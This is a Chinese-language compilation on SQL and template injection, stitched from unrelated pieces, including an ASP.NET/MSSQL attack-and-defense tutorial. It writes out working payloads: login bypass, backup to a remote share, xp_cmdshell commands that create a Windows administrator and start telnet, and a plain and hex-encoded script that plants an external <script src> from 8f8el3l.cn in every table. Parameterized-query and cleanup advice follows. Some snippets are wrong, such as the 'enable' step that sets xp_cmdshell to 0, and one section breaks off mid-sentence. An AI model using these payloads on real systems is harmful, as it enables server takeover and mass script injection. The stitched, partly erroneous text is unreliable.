QL注入是一種安全漏洞，攻擊者利用它來通過操縱應(yīng)用程序的數(shù)據(jù)庫(kù)查詢來執(zhí)行惡意的SQL命令。下面是一些SQL注入的基本概念、技巧和類型概覽，但請(qǐng)注意，這些知識(shí)應(yīng)用于教育和防御目的，不應(yīng)用于非法活動(dòng)。

基本概念

• 注入點(diǎn)：任何用戶輸入可以影響SQL查詢的地方都可能是注入點(diǎn)，比如登錄表單、搜索框、URL參數(shù)等。
• 目標(biāo)：獲取數(shù)據(jù)（如密碼、個(gè)人信息）、篡改數(shù)據(jù)、執(zhí)行系統(tǒng)命令或完全控制數(shù)據(jù)庫(kù)服務(wù)器。

注入類型

1. 數(shù)字型注入：注入點(diǎn)期望數(shù)字輸入，通常出現(xiàn)在ID查詢中。
2. 字符型注入：注入點(diǎn)期望字符串輸入，需要使用引號(hào)閉合并逃逸。
3. 布爾型注入：通過構(gòu)造SQL使查詢結(jié)果為真或假，根據(jù)頁(yè)面返回的變化判斷注入成功與否。
4. 聯(lián)合查詢注入（UNION）：當(dāng)原查詢已經(jīng)使用了SELECT，攻擊者可以附加一個(gè)UNION來合并額外的查詢，用于泄露數(shù)據(jù)。
5. 報(bào)錯(cuò)注入：利用數(shù)據(jù)庫(kù)的錯(cuò)誤信息輸出來獲取敏感信息。
6. 時(shí)間盲注：當(dāng)直接輸出被禁止時(shí)，通過比較查詢執(zhí)行時(shí)間來推斷數(shù)據(jù)。
7. 堆疊注入：通過分號(hào);或換行符\n分隔執(zhí)行多條SQL語句，可能包括添加管理員賬戶等操作。
8. 布爾盲注與時(shí)間盲注的變體：包括基于位運(yùn)算的盲注、基于條件的盲注等高級(jí)技巧。

技巧與示例

• 探測(cè)注入點(diǎn)：通過輸入單引號(hào) ' 或 1=1 和 1=2 來觀察頁(yè)面反應(yīng)，判斷是否存在注入。
• 猜解表名和列名：使用 ORDER BY 探測(cè)列數(shù)，INFORMATION_SCHEMA 查詢數(shù)據(jù)庫(kù)、表和列信息。
• 數(shù)據(jù)提取：通過 UNION SELECT 或逐步構(gòu)建邏輯表達(dá)式來提取具體數(shù)據(jù)。
• 利用注釋符：如 -- 或 /* ... */ 來注釋掉原查詢剩余部分，插入惡意代碼。
• 字符編碼與編碼繞過：使用URL編碼、HTML實(shí)體編碼、十六進(jìn)制等方法繞過過濾機(jī)制。

防御措施

• 預(yù)編譯語句/參數(shù)化查詢：確保數(shù)據(jù)與SQL命令分離。
• 輸入驗(yàn)證與過濾：嚴(yán)格檢查并清理用戶輸入。
• 最小權(quán)限原則：應(yīng)用程序連接數(shù)據(jù)庫(kù)的賬戶只賦予必要的權(quán)限。
• 錯(cuò)誤信息管理：避免在錯(cuò)誤頁(yè)面顯示詳細(xì)數(shù)據(jù)庫(kù)錯(cuò)誤信息。
• 安全層與WAF：部署防火墻和安全中間件，阻止已知的SQL注入攻擊模式。

了解這些是為了更好地保護(hù)系統(tǒng)免受SQL注入攻擊，強(qiáng)調(diào)安全編程和防御措施的重要性。

網(wǎng)頁(yè)設(shè)計(jì)中，模板是一個(gè)類似于 HTML 的文件，其中散布著程序指令，這些指令將在運(yùn)行時(shí)由 Web 服務(wù)器或?yàn)g覽器中的 JavaScript 代碼解釋。

模板是一個(gè)靜態(tài)文件，用于通過插入數(shù)據(jù)庫(kù)檢索或者從 HTTP 提取的動(dòng)態(tài)內(nèi)容來生成 HTML 。

當(dāng)模板引擎將動(dòng)態(tài)內(nèi)容視為要執(zhí)行的代碼而不是要插入的數(shù)據(jù)時(shí)，就會(huì)發(fā)生模板注入漏洞。

這會(huì)允許攻擊者在服務(wù)器或受害者的瀏覽器中執(zhí)行惡意代碼。

Angular 中的模板注入
Angular 應(yīng)用由一組分層組件組成，這些組件封裝了應(yīng)用程序邏輯和狀態(tài)信息。每組件在瀏覽器中使用模板呈現(xiàn)，該模板描述要輸出的給定狀態(tài)的 HTML元件。React模板將使用"{{"和"}}"分隔符安全的差值狀態(tài)，并允許組件以偵聽使用事件處理程序的用戶交互。使用"@Component"裝飾器將模板附加到組件。

可以使用"templateUrl"選項(xiàng)，提供相應(yīng)模板文件的相對(duì)或絕對(duì)路徑：

typescript
@Component({
  selector:    'app-login',
  templateUrl: './login.component.html',
  styleUrls:   ['./login.component.css']
})
export class LoginComponent {}

模板也可以使用"模板"選項(xiàng)作為內(nèi)聯(lián)字符串提供：

typescript
@Component({
  selector: 'app-login',
  template: '<form (ngSubmit)="onSubmit()">' + 
            '<input type="text"     placeholder="Username" [(ngModel)]="username" />' +
            '<input type="password" placeholder="Password" [(ngModel)]="password" />' +
            '<button type="submit">Login</button>' + 
            '</form>',
  styleUrls: ['./login.component.css']
})
export class LoginComponent {}

當(dāng)不受信任的輸入傳遞到"模板"選項(xiàng)時(shí)，Angular中會(huì)發(fā)生模板注入漏洞，當(dāng)模板字符串由字符串串聯(lián)生成時(shí)：

typescript
@Component({
  selector: 'app-header',
  template: '<h1>' + (window.location.hash || 'Home') + '</h1>'
})
export class HeaderComponent {}

避免以這種方式動(dòng)態(tài)生成的模板。

相反，將狀態(tài)加載到組件中，并使用 Angular 的內(nèi)置插值邏輯，可安全地轉(zhuǎn)義任何不受信任的內(nèi)容：

typescript
@Component({
  selector: 'app-header',
  template: '<h1>{{ title }}</h1>'
})
export class HeaderComponent {
  title=''  
    
  ngOnInit() {
    this.title=window.location.hash || 'Home';
  }
}

React 中的模板注入大多數(shù) React 開發(fā)人員使用 JSX 以 JavaScript 語法制作原生的 HTML 標(biāo)簽。

JSX 讓動(dòng)態(tài)渲染變得容易
對(duì)應(yīng)于從服務(wù)器加載的數(shù)據(jù)的頁(yè)面元素。

在構(gòu)建過程中將代碼轉(zhuǎn)譯為 JavaScript 時(shí)，提供所有 React 組件在 JSX 中定義，通?？梢悦馐苣０遄⑷牍?。

然而，React 組件可以直接從運(yùn)行時(shí)使用

React.createElement(...)

函數(shù)的低級(jí) API。

如果使用不受信任的方式調(diào)用此方法內(nèi)容，很容易受到模板注入攻擊：

jsx
const tagName='div'
const attributes={ class: 'page-contents' }
const textContent='Tag contents go here'

/**
 * Dynamically create a React component, in this case:
 * 
 *   <div class="page-contents">Tag contents go here</div>
 *   
 * If any of the arguments come from an untrusted source an attacker can inject malicious content.
 */
React.createElement(
  tagName,
  attributes,
  textContent
)

如果調(diào)用

dangerouslySetInnerHTML

攻擊者還可以控制 HTML 標(biāo)簽的屬性和內(nèi)容React 組件上的函數(shù)：

jsx
/**
 * React allows you to write raw HTML from a string, but discourages it - hence the function name
 * "dangerouslySetInnerHTML(...)"! If the inputs to this function are taken from an untrusted source
 * you are vulnerable to template injection.
 */
const html={ 
  __html: '<div class="page-contents">Tag contents go here</div>' 
}
<div dangerouslySetInnerHTML={html} />

React 中模板注入漏洞的最終來源是href屬性，如果鏈接的href屬性或者import語句是從不受信任的內(nèi)容動(dòng)態(tài)生成的，攻擊者可以通過提供帶有javascript：前綴的 URL：

業(yè)開始從事winform到今年轉(zhuǎn)到 web ，在碼農(nóng)屆已經(jīng)足足混了快接近3年了，但是對(duì)安全方面的知識(shí)依舊薄弱，事實(shí)上是沒機(jī)會(huì)接觸相關(guān)開發(fā)……必須的各種借口。這幾天把sql注入的相關(guān)知識(shí)整理了下，希望大家多多提意見。

（對(duì)于sql注入的攻防，我只用過簡(jiǎn)單拼接字符串的注入及參數(shù)化查詢，可以說沒什么好經(jīng)驗(yàn)，為避免后知后覺地犯下大錯(cuò)，專門查看大量前輩們的心得，這方面的資料頗多，將其精簡(jiǎn)出自己覺得重要的，就成了該文）

下面的程序方案是采用 ASP.NET + MSSQL，其他技術(shù)在設(shè)置上會(huì)有少許不同。

示例程序下載：SQL注入攻防入門詳解_示例

什么是SQL注入（SQL Injection）

所謂SQL注入式攻擊，就是攻擊者把SQL命令插入到Web表單的輸入域或頁(yè)面請(qǐng)求的查詢字符串，欺騙服務(wù)器執(zhí)行惡意的SQL命令。在某些表單中，用戶輸入的內(nèi)容直接用來構(gòu)造（或者影響）動(dòng)態(tài)SQL命令，或作為存儲(chǔ)過程的輸入?yún)?shù)，這類表單特別容易受到SQL注入式攻擊。

嘗嘗SQL注入

1. 一個(gè)簡(jiǎn)單的登錄頁(yè)面

關(guān)鍵代碼：（詳細(xì)見下載的示例代碼）

private bool NoProtectLogin(string userName, string password)

{

int count=(int)SqlHelper.Instance.ExecuteScalar(string.Format

("SELECT COUNT(*) FROM Login WHERE UserName='{0}' AND Password='{1}'", userName, password));

return count > 0 ? true : false;

}

方法中userName和 password 是沒有經(jīng)過任何處理，直接拿前端傳入的數(shù)據(jù)，這樣拼接的SQL會(huì)存在注入漏洞。（賬戶：admin 123456）

1) 輸入正常數(shù)據(jù)，效果如圖：

合并的SQL為：

SELECT COUNT(*) FROM Login WHERE UserName='admin' AND Password='123456'

2) 輸入注入數(shù)據(jù)：

如圖，即用戶名為：用戶名：admin’—，密碼可隨便輸入

合并的SQL為：

SELECT COUNT(*) FROM Login WHERE UserName='admin'-- Password='123'

因?yàn)閁serName值中輸入了“--”注釋符，后面語句被省略而登錄成功。（常常的手法：前面加上'; ' (分號(hào)，用于結(jié)束前一條語句)，后邊加上'--' (用于注釋后邊的語句)）

2. 上面是最簡(jiǎn)單的一種SQL注入，常見的注入語句還有：

1) 猜測(cè)數(shù)據(jù)庫(kù)名，備份數(shù)據(jù)庫(kù)

a) 猜測(cè)數(shù)據(jù)庫(kù)名： and db_name() >0 或系統(tǒng)表master.dbo.sysdatabases

b) 備份數(shù)據(jù)庫(kù)：;backup database 數(shù)據(jù)庫(kù)名 to disk=‘c:\*.db’;--

或：declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目錄bak.dat' ,name='test';--

2) 猜解字段名稱

a) 拆解法：and (select count(字段名) from 表名)>0 若“字段名”存在，則返回正常

b) 讀取法：and (select top 1 col_name(object_id('表名'),1) from sysobjects)>0 把col_name(object_id('表名'),1)中的1依次換成2,3,4,5，6…就可以得到所有的字段名稱。

3) 遍歷系統(tǒng)的目錄結(jié)構(gòu)，分析結(jié)構(gòu)并發(fā)現(xiàn)WEB虛擬目錄（服務(wù)器上傳木馬）

先創(chuàng)建一個(gè)臨時(shí)表：;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

a) 利用xp_availablemedia來獲得當(dāng)前所有驅(qū)動(dòng)器,并存入temp表中

;insert temp exec master.dbo.xp_availablemedia;--

b) 利用xp_subdirs獲得子目錄列表,并存入temp表中

;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--

c) 利用xp_dirtree可以獲得“所有”子目錄的目錄樹結(jié)構(gòu),并存入temp表中

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- （實(shí)驗(yàn)成功）

d) 利用 bcp 命令將表內(nèi)容導(dǎo)成文件

即插入木馬文本，然后導(dǎo)出存為文件。比如導(dǎo)出為asp文件，然后通過瀏覽器訪問該文件并執(zhí)行惡意腳本。（使用該命令必須啟動(dòng)’ xp_cmdshell’）

Exec master..xp_cmdshell N'BCP "select * from SchoolMarket.dbo.GoodsStoreData;" queryout c:/inetpub/wwwroot/runcommand.asp -w -S"localhost" -U"sa" -P"123"'

(注意：語句中使用的是雙引號(hào)，另外表名格式為“數(shù)據(jù)庫(kù)名.用戶名.表名”)

在sql查詢器中通過語句：Exec master..xp_cmdshell N'BCP’即可查看BCP相關(guān)參數(shù)，如圖：

4) 查詢當(dāng)前用戶的數(shù)據(jù)庫(kù)權(quán)限

MSSQL中一共存在8種權(quán)限：sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin, bulkadmin。

可通過1=(select IS_SRVROLEMEMBER('sysadmin'))得到當(dāng)前用戶是否具有該權(quán)限。

5) 設(shè)置新的數(shù)據(jù)庫(kù)帳戶（得到MSSQL管理員賬戶）

d) 在數(shù)據(jù)庫(kù)內(nèi)添加一個(gè)hax用戶，默認(rèn)密碼是空的

;exec sp_addlogin'hax';--

e) 給hax設(shè)置密碼 (null是舊密碼，password是新密碼，user是用戶名)

;exec master.dbo.sp_password null,password,username;--

f) 將hax添加到sysadmin組

;exec master.dbo.sp_addsrvrolemember 'hax' ,'sysadmin';--

6) xp_cmdshell MSSQL存儲(chǔ)過程（得到 WINDOWS管理員賬戶 ）

通過(5)獲取到sysadmin權(quán)限的帳戶后，使用查詢分析器連接到數(shù)據(jù)庫(kù)，可通過xp_cmdshell運(yùn)行系統(tǒng)命令行（必須是sysadmin權(quán)限），即使用 cmd.exe 工具，可以做什么自己多了解下。

下面我們使用xp_cmdshell來創(chuàng)建一個(gè) Windows 用戶，并開啟遠(yuǎn)程登錄服務(wù)：

a) 判斷xp_cmdshell擴(kuò)展存儲(chǔ)過程是否存在

SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'

b) 恢復(fù)xp_cmdshell擴(kuò)展存儲(chǔ)過程

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';

開啟后使用xp_cmdshell還會(huì)報(bào)下面錯(cuò)誤：

SQL Server 阻止了對(duì)組件 'xp_cmdshell' 的過程 'sys.xp_cmdshell' 的訪問，因?yàn)榇私M件已作為此服務(wù)器安全配置的一部分而被關(guān)閉。系統(tǒng)管理員可以通過使用sp_configure啟用 'xp_cmdshell'。有關(guān)啟用'xp_cmdshell' 的詳細(xì)信息，請(qǐng)參閱 SQL Server 聯(lián)機(jī)叢書中的 "外圍應(yīng)用配置器"。

通過執(zhí)行下面的語句進(jìn)行設(shè)置：

-- 允許配置高級(jí)選項(xiàng)

EXEC sp_configure 'show advanced options', 1

GO

-- 重新配置

RECONFIGURE

GO

-- 啟用xp_cmdshell

EXEC sp_configure 'xp_cmdshell', 0

GO

--重新配置

RECONFIGURE

GO

c) 禁用xp_cmdshell擴(kuò)展存儲(chǔ)過程

Exec master.dbo.sp_dropextendedproc 'xp_cmdshell';

d) 添加windows用戶：

Exec xp_cmdshell 'net user awen /add';

e) 設(shè)置好密碼：

Exec xp_cmdshell 'net user awen password';

f) 提升到管理人員：

Exec xp_cmdshell 'net localgroup administrators awen /add';

g) 開啟telnet服務(wù)：

Exec xp_cmdshell 'net start tlntsvr'

7) 沒有xp_cmdshell擴(kuò)展程序，也可創(chuàng)建Windows帳戶的辦法.

(本人windows7系統(tǒng)，測(cè)試下面SQL語句木有效果)

declare @shell int ;

execsp_OAcreate 'w script .shell',@shell output ;

execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen /add';

execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen 123';

execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net localgroup administrators awen /add';

在使用的時(shí)候會(huì)報(bào)如下錯(cuò)：

SQL Server 阻止了對(duì)組件 'Ole Automation Procedures' 的過程 'sys.sp_OACreate'、'sys.sp_OAMethod' 的訪問，因?yàn)榇私M件已作為此服務(wù)器安全配置的一部分而被關(guān)閉。系統(tǒng)管理員可以通過使用sp_configure啟用 'Ole Automation Procedures'。有關(guān)啟用 'Ole Automation Procedures' 的詳細(xì)信息，請(qǐng)參閱 SQL Server 聯(lián)機(jī)叢書中的 "外圍應(yīng)用配置器"。

解決辦法：

sp_configure 'show advanced options', 1;

GO

RECONFIGURE;

GO

sp_configure 'Ole Automation Procedures', 1;

GO

RECONFIGURE;

GO

好了，這樣別人可以登錄你的服務(wù)器了，你怎么看？

8) 客戶端腳本攻擊

攻擊1：（正常輸入）攻擊者通過正常的輸入提交方式將惡意腳本提交到數(shù)據(jù)庫(kù)中，當(dāng)其他用戶瀏覽此內(nèi)容時(shí)就會(huì)受到惡意腳本的攻擊。

措施：轉(zhuǎn)義提交的內(nèi)容，.NET 中可通過System.Net.WebUtility.HtmlEncode(string) 方法將字符串轉(zhuǎn)換為HTML編碼的字符串。

攻擊2：（SQL注入）攻擊者通過SQL注入方式將惡意腳本提交到數(shù)據(jù)庫(kù)中，直接使用SQL語法UPDATE數(shù)據(jù)庫(kù)，為了跳過System.Net.WebUtility.HtmlEncode(string) 轉(zhuǎn)義，攻擊者會(huì)將注入SQL經(jīng)過“HEX編碼”，然后通過exec可以執(zhí)行“動(dòng)態(tài)”SQL的特性運(yùn)行腳本”。

參考：

注入：SQL注入案例曝光，請(qǐng)大家提高警惕

恢復(fù)：批量清除數(shù)據(jù)庫(kù)中被植入的js

示例代碼：（可在示例附帶的數(shù)據(jù)庫(kù)測(cè)試）

a) 向當(dāng)前數(shù)據(jù)庫(kù)的每個(gè)表的每個(gè)字段插入一段惡意腳本

1

2

3

4

5

6

7

8

9

10

11

12

13

Declare @T Varchar(255),@C Varchar(255)

Declare Table_Cursor Cursor For

Select A.Name,B.Name

From SysobjectsA,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor

Fetch Next From Table_Cursor Into @T,@C

While(@@Fetch_Status=0)

Begin

Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://8f8el3l.cn/0.js></script>''')

Fetch Next From Table_Cursor Into @T,@C

End

Close Table_Cursor

DeallocateTable_Cursor

b) 更高級(jí)的攻擊，將上面的注入SQL進(jìn)行“HEX編碼”，從而避免程序的關(guān)鍵字檢查、腳本轉(zhuǎn)義等，通過EXEC執(zhí)行

dEcLaRe @s vArChAr(8000) sEt @s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72;

eXeC(@s);--

c) 批次刪除數(shù)據(jù)庫(kù)被注入的腳本

declare @delStrnvarchar(500)

set @delStr='<script src=http://8f8el3l.cn/0.js></script>' --要被替換掉字符

setnocount on

declare @tableNamenvarchar(100),@columnNamenvarchar(100),@tbIDint,@iRowint,@iResultint

declare @sqlnvarchar(500)

set @iResult=0

declare cur cursor for

selectname,id from sysobjects where xtype='U'

open cur

fetch next from cur into @tableName,@tbID

while @@fetch_status=0

begin

declare cur1 cursor for

--xtype in (231,167,239,175) 為char,varchar,nchar,nvarchar類型

select name from syscolumns where xtype in (231,167,239,175) and id=@tbID

open cur1

fetch next from cur1 into @columnName

while @@fetch_status=0

begin

set @sql='update [' + @tableName + '] set ['+ @columnName +']=replace(['+@columnName+'],'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''

execsp_executesql @sql

set @iRow=@@rowcount

set @iResult=@iResult+@iRow

if @iRow>0

begin

print '表：'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'條記錄;'

end

fetch next from cur1 into @columnName

end

close cur1

deallocate cur1

fetch next from cur into @tableName,@tbID

end

print '數(shù)據(jù)庫(kù)共有'+convert(varchar(10),@iResult)+'條記錄被更新!!!'

close cur

deallocate cur

setnocount off

d) 我如何得到“HEX編碼”？

開始不知道HEX是什么東西，后面查了是“十六進(jìn)制”，網(wǎng)上已經(jīng)給出兩種轉(zhuǎn)換方式：（注意轉(zhuǎn)換的時(shí)候不要加入十六進(jìn)制的標(biāo)示符 ’0x’ ）

? 在線轉(zhuǎn)換 （TRANSLATOR, BINARY），進(jìn)入……

? C#版的轉(zhuǎn)換，進(jìn)入……

9) 對(duì)于敏感詞過濾不到位的檢查，我們可以結(jié)合函數(shù)構(gòu)造SQL注入

比如過濾了update，卻沒有過濾declare、exec等關(guān)鍵詞，我們可以使用reverse來將倒序的sql進(jìn)行注入：

declare @A varchar(200);set @A=reverse('''58803303431''=emanresu erehw ''9d4d9c1ac9814f08''=drowssaP tes xxx tadpu');

防止SQL注入

1. 數(shù)據(jù)庫(kù)權(quán)限控制，只給訪問數(shù)據(jù)庫(kù)的web應(yīng)用功能所需的最低權(quán)限帳戶。

如MSSQL中一共存在8種權(quán)限：sysadmin, dbcreator, diskadmin, processadmin, serveradmin, setupadmin, securityadmin, bulkadmin。

2. 自定義錯(cuò)誤信息，首先我們要屏蔽服務(wù)器的詳細(xì)錯(cuò)誤信息傳到客戶端。

在 ASP.NET 中，可通過web.config配置文件的<customErrors>節(jié)點(diǎn)設(shè)置：

<customErrors defaultRedirect="url" mode="On|Off|RemoteOnly">

<error. . ./>

</customErrors>

更詳細(xì)，請(qǐng)進(jìn)入……

mode：指定是啟用或禁用自定義錯(cuò)誤，還是僅向遠(yuǎn)程客戶端顯示自定義錯(cuò)誤。

On

指定啟用自定義錯(cuò)誤。如果未指定defaultRedirect，用戶將看到一般性錯(cuò)誤。

Off

指定禁用自定義錯(cuò)誤。這允許顯示標(biāo)準(zhǔn)的詳細(xì)錯(cuò)誤。

RemoteOnly

指定僅向遠(yuǎn)程客戶端顯示自定義錯(cuò)誤并且向本地主機(jī)顯示ASP.NET 錯(cuò)誤。這是默認(rèn)值。

看下效果圖：

設(shè)置為<customErrors mode="On">一般性錯(cuò)誤：

設(shè)置為<customErrors mode="Off">：

3. 把危險(xiǎn)的和不必要的存儲(chǔ)過程刪除

xp_：擴(kuò)展存儲(chǔ)過程的前綴，SQL注入攻擊得手之后，攻擊者往往會(huì)通過執(zhí)行xp_cmdshell之類的擴(kuò)展存儲(chǔ)過程，獲取系統(tǒng)信息，甚至控制、破壞系統(tǒng)。

xp_cmdshell

能執(zhí)行dos命令，通過語句sp_dropextendedproc刪除，

不過依然可以通過sp_addextendedproc來恢復(fù)，因此最好刪除或改名xplog70.dll（sql server 2000、windows7）

xpsql70.dll(sqlserer 7.0)

xp_fileexist

用來確定一個(gè)文件是否存在

xp_getfiledetails

可以獲得文件詳細(xì)資料

xp_dirtree

可以展開你需要了解的目錄，獲得所有目錄深度

Xp_getnetname

可以獲得服務(wù)器名稱

Xp_regaddmultistring

Xp_regdeletekey

Xp_regdeletevalue

Xp_regenumvalues

Xp_regread

Xp_regremovemultistring

Xp_regwrite

可以訪問注冊(cè)表的存儲(chǔ)過程

Sp_OACreate

Sp_OADestroy

Sp_OAGetErrorInfo

Sp_OAGetProperty

Sp_OAMethod

Sp_OASetProperty

Sp_OAStop

如果你不需要請(qǐng)丟棄OLE自動(dòng)存儲(chǔ)過程

4. 非參數(shù)化SQL與參數(shù)化SQL

1) 非參數(shù)化（動(dòng)態(tài)拼接SQL）

a) 檢查客戶端腳本：若使用.net，直接用System.Net.WebUtility.HtmlEncode(string)將輸入值中包含的《HTML特殊轉(zhuǎn)義字符》轉(zhuǎn)換掉。

b) 類型檢查：對(duì)接收數(shù)據(jù)有明確要求的，在方法內(nèi)進(jìn)行類型驗(yàn)證。如數(shù)值型用int.TryParse()，日期型用DateTime.TryParse() ，只能用英文或數(shù)字等。

c) 長(zhǎng)度驗(yàn)證：要進(jìn)行必要的注入，其語句也是有長(zhǎng)度的。所以如果你原本只允許輸入10字符，那么嚴(yán)格控制10個(gè)字符長(zhǎng)度，一些注入語句就沒辦法進(jìn)行。

d) 使用枚舉：如果只有有限的幾個(gè)值，就用枚舉。

e) 關(guān)鍵字過濾：這個(gè)門檻比較高，因?yàn)楦鱾€(gè)數(shù)據(jù)庫(kù)存在關(guān)鍵字，內(nèi)置函數(shù)的差異，所以對(duì)編寫此函數(shù)的功底要求較高。如公司或個(gè)人有積累一個(gè)比較好的通用過濾函數(shù)還請(qǐng)留言分享下，學(xué)習(xí)學(xué)習(xí)，謝謝！

這邊提供一個(gè)關(guān)鍵字過濾參考方案(MSSQL)：

public static bool ValiParms(string parms)

{

if (parms==null)

{

return false;

}

Regex regex=new Regex("sp_", RegexOptions.IgnoreCase);

Regex regex2=new Regex("'", RegexOptions.IgnoreCase);

Regex regex3=new Regex("create ", RegexOptions.IgnoreCase);

Regex regex4=new Regex("drop ", RegexOptions.IgnoreCase);

Regex regex5=new Regex("\"", RegexOptions.IgnoreCase);

Regex regex6=new Regex("exec ", RegexOptions.IgnoreCase);

Regex regex7=new Regex("xp_", RegexOptions.IgnoreCase);

Regex regex8=new Regex("insert ", RegexOptions.IgnoreCase);

Regex regex9=new Regex("delete ", RegexOptions.IgnoreCase);

Regex regex10=new Regex("select ", RegexOptions.IgnoreCase);

Regex regex11=new Regex("update ", RegexOptions.IgnoreCase);

return (regex.IsMatch(parms) || (regex2.IsMatch(parms) || (regex3.IsMatch(parms) || (regex4.IsMatch(parms) || (regex5.IsMatch(parms) || (regex6.IsMatch(parms) || (regex7.IsMatch(parms) || (regex8.IsMatch(parms) || (regex9.IsMatch(parms) || (regex10.IsMatch(parms) || (regex11.IsMatch(parms))))))))))));

}

優(yōu)點(diǎn)：寫法相對(duì)簡(jiǎn)單，網(wǎng)絡(luò)傳輸量相對(duì)參數(shù)化拼接SQL小

缺點(diǎn)：

a) 對(duì)于關(guān)鍵字過濾，常常“顧此失彼”，如漏掉關(guān)鍵字，系統(tǒng)函數(shù)，對(duì)于HEX編碼的SQL語句沒辦法識(shí)別等等，并且需要針對(duì)各個(gè)數(shù)據(jù)庫(kù)封裝函數(shù)。

b) 無法滿足需求：用戶本來就想發(fā)表包含這些過濾字符的數(shù)據(jù)。

c) 執(zhí)行拼接的SQL浪費(fèi)大量緩存空間來存儲(chǔ)只用一次的查詢計(jì)劃。服務(wù)器的物理內(nèi)存有限，SQLServer的緩存空間也有限。有限的空間應(yīng)該被充分利用。

2) 參數(shù)化查詢（Parameterized Query）

a) 檢查客戶端腳本，類型檢查，長(zhǎng)度驗(yàn)證，使用枚舉，明確的關(guān)鍵字過濾這些操作也是需要的。他們能盡早檢查出數(shù)據(jù)的有效性。

b) 參數(shù)化查詢?cè)恚?/span>在使用參數(shù)化查詢的情況下，數(shù)據(jù)庫(kù)服務(wù)器不會(huì)將參數(shù)的內(nèi)容視為SQL指令的一部份來處理，而是在數(shù)據(jù)庫(kù)完成 SQL 指令的編譯后，才套用參數(shù)運(yùn)行，因此就算參數(shù)中含有具有損的指令，也不會(huì)被數(shù)據(jù)庫(kù)所運(yùn)行。

c) 所以在實(shí)際開發(fā)中，入口處的安全檢查是必要的，參數(shù)化查詢應(yīng)作為最后一道安全防線。

優(yōu)點(diǎn)：

? 防止SQL注入(使單引號(hào)、分號(hào)、注釋符、xp_擴(kuò)展函數(shù)、拼接SQL語句、EXEC、SELECT、UPDATE、DELETE等SQL指令無效化)

? 參數(shù)化查詢能強(qiáng)制執(zhí)行類型和長(zhǎng)度檢查。

? 在MSSQL中生成并重用查詢計(jì)劃，從而提高查詢效率（執(zhí)行一條SQL語句，其生成查詢計(jì)劃將消耗大于50%的時(shí)間）

缺點(diǎn)：

? 不是所有數(shù)據(jù)庫(kù)都支持參數(shù)化查詢。目前Access、SQL Server、MySQL、SQLite、Oracle等常用數(shù)據(jù)庫(kù)支持參數(shù)化查詢。

疑問：參數(shù)化如何“批量更新”數(shù)據(jù)庫(kù)。

a) 通過在參數(shù)名上增加一個(gè)計(jì)數(shù)來區(qū)分開多個(gè)參數(shù)化語句拼接中的同名參數(shù)。

EG：

StringBuilder sqlBuilder=new StringBuilder(512);

Int count=0;

For(循環(huán))

{

sqlBuilder.AppendFormat(“UPDATE login SET password=@password{0} WHERE username=@userName{0}”,count.ToString());

SqlParameter para=new SqlParamter(){ParameterName=@password+count.ToString()}

……

Count++;

}

b) 通過MSSQL 2008的新特性：表值參數(shù)，將C#中的整個(gè)表當(dāng)參數(shù)傳遞給存儲(chǔ)過程，由SQL做邏輯處理。注意C#中參數(shù)設(shè)置parameter.SqlDbType=System.Data.SqlDbType.Structured; 詳細(xì)請(qǐng)查看……

疑慮：有部份的開發(fā)人員可能會(huì)認(rèn)為使用參數(shù)化查詢，會(huì)讓程序更不好維護(hù)，或者在實(shí)現(xiàn)部份功能上會(huì)非常不便，然而，使用參數(shù)化查詢?cè)斐傻念~外開發(fā)成本，通常都遠(yuǎn)低于因?yàn)镾QL注入攻擊漏洞被發(fā)現(xiàn)而遭受攻擊，所造成的重大損失。

另外：想驗(yàn)證重用查詢計(jì)劃的同學(xué)，可以使用下面兩段輔助語法

--清空緩存的查詢計(jì)劃

DBCC FREEPROCCACHE

GO

--查詢緩存的查詢計(jì)劃

SELECT stats.execution_count AS cnt, p.size_in_bytes AS [size], [sql].[text] AS [plan_text]

FROM sys.dm_exec_cached_plans p

OUTER APPLY sys.dm_exec_sql_text (p.plan_handle) sql

JOIN sys.dm_exec_query_stats stats ON stats.plan_handle=p.plan_handle

GO

3) 參數(shù)化查詢示例

效果如圖：

參數(shù)化關(guān)鍵代碼：

Private bool ProtectLogin(string userName, string password)

{

SqlParameter[] parameters=new SqlParameter[]

{

new SqlParameter{ParameterName="@UserName",SqlDbType=SqlDbType.NVarChar,Size=10,Value=userName},

new SqlParameter{ParameterName="@Password",SqlDbType=SqlDbType.VarChar,Size=20,Value=password}

};

int count=(int)SqlHelper.Instance.ExecuteScalar

("SELECT COUNT(*) FROM Login WHERE UserName=@UserName AND Password=@password", parameters);

return count > 0 ? true : false;

}

5. 存儲(chǔ)過程

